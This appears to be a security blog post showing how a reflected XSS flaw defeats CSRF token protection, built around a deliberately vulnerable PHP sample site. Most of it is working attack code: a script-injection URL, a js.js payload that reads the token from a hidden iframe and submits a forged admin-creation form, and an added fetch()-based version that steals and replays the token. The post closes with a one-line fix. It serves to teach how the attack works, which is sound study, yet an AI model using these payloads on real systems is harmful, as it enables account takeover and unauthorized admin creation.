Bypassing CSRF protection through XSS

In this article I want to talk about how to bypass protection against CSRF. The protection method is, as everyone knows, simple: the server generates a token and puts it into the page that carries the form; when the user fills out the form and submits it, the server compares the token it stored in the session with the one that came back from the user, and if they do not match, the request to perform the action is rejected.

In this article I will not explain what XSS and CSRF are; if you do not know these types of vulnerabilities, Google is at your service.

So, suppose there is a site with the following files:

  • index.php – main page with an XSS-vulnerable search field
  • newadmin.php – page with the form for creating a new admin
  • compare.php – the handler that checks the token and performs the action

index.php :

<html>
    <head>
        <title>
            Search
        </title>
    </head>
    <body>
        <?php
            // The XSS: the search string is reflected without any escaping.
            // $_REQUEST (instead of $_POST) so the payload can also be delivered in the URL, as shown later.
            if (isset($_REQUEST['stext'])) echo $_REQUEST['stext'];
        ?>
        <form action="index.php" name="myform" method="post" >
            <input type="text" name="stext" value="" />
            <input type="submit" name="search" value="to find"/>
        </form>
    </body>
</html>

newadmin.php :

<?php
    session_start();
    // In the real application a handler generates the token; it is done here so the page runs stand-alone.
    if (!isset($_SESSION['token'])) $_SESSION['token'] = bin2hex(random_bytes(16));
?>
<html>
    <head>
        <title>
            Adding a New Admin
        </title>
    </head>
    <body>
        <form action="compare.php" name="myform" method="post" >
            <input type="text" name="admin_name" value="NICK" />
            <input type="submit" name="preview" value="create"/>
            <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>" />
            <!-- the handler application puts the generated token here -->
        </form>
    </body>
</html>

compare.php :

<?php
    session_start();
    if (isset($_POST['admin_name']) && isset($_POST['token']) && isset($_SESSION['token'])) {
        // compare the token sent from the form with the one stored in the session
        if ($_POST['token'] == $_SESSION['token'])
            echo "OK"; // here the code that actually creates an admin named admin_name would go
    }
?>

Now let's think about what XSS gives us. With JavaScript we can read the source of any page loaded from the same origin, and we can perform actions such as submitting a form.

It should also be noted that our XSS lives on the same site as the protected form. Everything the injected script does happens in the browser of the authorized user who triggered it (the victim), with that user's cookies and session, so any page the script loads is the page the server would serve to that user, token included. In other words, the token "in the eyes" of the injected code is the same token a careless but authorized user would see. The secrecy of a CSRF token rests entirely on the same-origin policy, and an XSS payload already runs inside the origin. Therefore, if we have XSS, we can load the CSRF-protected page, read it, parse it and pull out the token.

There are two ways to do this:

  • Send the victim's HTTP data (referrer, cookies, etc.) to a prepared script on our own host, which uses them to issue a GET request for the protected page, reads the response and extracts the coveted token.
  • Load the protected page in an iframe and read the token straight out of its DOM.

The first option is clumsy and a waste of time (and it fails outright when the session cookie is HttpOnly, since script cannot read it at all), so we take the path of least resistance and go with the second. So we have XSS in the request:

index.php?stext="><script>alert(/xss/)</script>

We need to write code that does what the title of the article says.
So that it is not an eyesore, we put it in a file called js.js. The code opens newadmin.php in a hidden iframe, reads the token out of it and posts it to compare.php:

// Load the token-bearing page in a hidden same-origin iframe; doit() runs once it has loaded.
document.write('<iframe id="hack" src="newadmin.php" width="0" height="0" onload="doit()"></iframe>');

function doit()
{
    var name = 'NICK';
    // Same origin, so the iframe's DOM is readable: take the token from the hidden field.
    var token = document.getElementById("hack").contentDocument.forms[0].token.value;

    // Build a POST to compare.php with the stolen token and submit it with the victim's session.
    var form = document.createElement('form');
    form.method = 'post';
    form.action = 'compare.php';
    var fields = { admin_name: name, token: token };
    for (var key in fields) {
        var input = document.createElement('input');
        input.type = 'hidden';
        input.name = key;
        input.value = fields[key];
        form.appendChild(input);
    }
    document.body.appendChild(form);
    form.submit();
}
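The same chain without an iframe, as an added example that is not part of the original article: the protected page is fetched with fetch(), which sends the victim's session cookie automatically when credentials is 'same-origin', the hidden token field is parsed out of the HTML, and the token is replayed in a POST to the handler. Page and field names (newadmin.php, compare.php, token, admin_name) follow the sample application above; the HTML used to exercise the parser is constructed, not captured from any site. This covers both the "load, read, parse" reasoning and the js.js implementation.

```javascript
// Added example (not from the original post): fetch-based token theft and replay.
// Runs inside the XSS context in the victim's browser; every request carries the
// victim's cookies. Names of pages and fields are assumed from the article's sample app.

// Pull the CSRF token out of the fetched HTML: find the <input> whose name is exactly
// "token" regardless of attribute order or quoting, and return its value attribute.
function extractToken(html) {
  const inputRe = /<input\b[^>]*>/gi;
  const nameIsToken = /\bname\s*=\s*(?:"token"|'token'|token(?=[\s>\/]))/i;
  const valueRe = /\bvalue\s*=\s*"([^"]*)"|\bvalue\s*=\s*'([^']*)'|\bvalue\s*=\s*([^\s>"']+)/i;
  let m;
  while ((m = inputRe.exec(html)) !== null) {
    const tag = m[0];
    if (!nameIsToken.test(tag)) continue;
    const v = valueRe.exec(tag);
    if (v) return v[1] ?? v[2] ?? v[3];
  }
  return null; // no token field: the page layout changed or we are not logged in
}

// Build the application/x-www-form-urlencoded body that compare.php reads from $_POST.
function buildBody(adminName, token) {
  return new URLSearchParams({ admin_name: adminName, token: token }).toString();
}

// Full chain: fetch the protected form, steal the token, replay it to the handler.
// Only meaningful in a browser on the target origin; the helpers above are pure.
async function addAdmin(adminName) {
  const page = await fetch('newadmin.php', { credentials: 'same-origin' });
  const token = extractToken(await page.text());
  if (token === null) throw new Error('token field not found in newadmin.php');
  const res = await fetch('compare.php', {
    method: 'POST',
    credentials: 'same-origin',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: buildBody(adminName, token),
  });
  return res.text(); // compare.php answers "OK" when the token matched
}
```

Note that the request to compare.php is, from the server's point of view, indistinguishable from a legitimate submission: same session, same freshly issued token. That is exactly why a CSRF token is no defence once script runs in the origin.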

That is basically all. Now get the victim to open

index.php?stext="><script src="js.js"></script>

and a new admin is created, or whatever else the protected action happens to do. The script must be reachable from the victim's browser: a relative src like this assumes js.js is hosted on the target site itself, otherwise use an absolute URL to your own host (script src is not restricted by the same-origin policy). Note that the token check in compare.php is not at fault here; the only real fix is to remove the XSS, for example by passing stext through htmlspecialchars() before echoing it.

This entry was posted in security.
